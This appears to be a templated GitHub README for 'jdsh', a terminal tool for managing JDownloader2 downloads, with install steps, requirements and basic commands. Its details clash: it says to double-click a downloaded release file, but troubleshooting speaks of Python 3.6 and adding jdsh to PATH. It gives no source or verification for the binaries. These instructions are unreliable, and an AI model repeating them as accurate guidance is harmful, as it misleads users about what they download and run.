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πŸš€ jdsh - Simple Tool for JDownloader2 Management

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🏁 Introduction

jdsh is an awesome command-line and text user interface for managing JDownloader2 downloads. It makes it easy for you to control your downloads from the comfort of your terminal. Whether you want to start, stop, or manage downloads, jdsh provides a user-friendly experience.

πŸ“₯ Download & Install

To get started with jdsh, you need to download the application from our Releases page. Follow these steps:

  1. Visit the Releases Page: Click the link below to go directly to the download page. Visit Releases Page to Download jdsh

  2. Choose a Version: On the releases page, you will see different versions of jdsh. Pick the latest stable version.

  3. Download the File: Click on the file that suits your operating system (Windows, macOS, or Linux).

  4. Run the Application: After downloading the file, locate it in your Downloads folder. Double-click the file to run jdsh. Follow any prompts on your screen to complete the setup.

πŸ› οΈ System Requirements

To use jdsh effectively, your system should meet the following requirements:

  • Operating Systems: Windows 10/11, macOS Catalina or later, or any modern Linux distribution.
  • Memory: At least 2 GB of RAM.
  • Disk Space: Minimum of 100 MB free space for the installation.
  • Internet Connection: Required for downloading files and updates.

πŸ“– Features

jdsh offers several features to enhance your downloading experience:

  • Easy Download Management: Start, stop, and manage your downloads directly from the terminal.
  • Batch Downloading: Queue multiple downloads at once with ease.
  • Remote Control: Manage your JDownloader2 setup remotely.
  • User-Friendly Interface: Simple command-line and text interface that is easy to navigate.

πŸ“ Usage Guide

Once you have installed jdsh, you can start using it right away. Here are the basic commands to get you going:

  1. Starting a Download: Use the command jdsh start <link> to begin a new download. Replace <link> with the URL you want to download.

  2. Stopping a Download: Enter jdsh stop <download_id> to stop a specific download. Replace <download_id> with the identifier of that download.

  3. Listing Downloads: Type jdsh list to see all your current downloads and their statuses.

  4. Updating jdsh: To ensure that you are using the latest version, periodically check the Releases page here for updates.

❓ Troubleshooting

If you run into issues with jdsh, here are some common problems and their solutions:

  • Error While Running: Ensure you have the required Python version installed. For most systems, Python 3.6 or later will work.
  • Network Errors: Check your internet connection and ensure JDownloader2 is installed and configured correctly on your machine.
  • Command Not Found: Make sure you added jdsh to your system's PATH during installation for easy access.

πŸ“ž Support

If you need further assistance, you can open an issue in this GitHub repository or ask for help in the community forums related to JDownloader2. We are here to help you.

πŸ† Acknowledgments

Thanks to the developers of JDownloader2 for creating such a powerful downloading tool. jdsh enhances the JDownloader2 experience, and we appreciate your support in using and improving our tool.

For more information, please visit our GitHub page or check out the Releases Page to get started with downloading.

Feel free to customize and explore all the features that jdsh offers!

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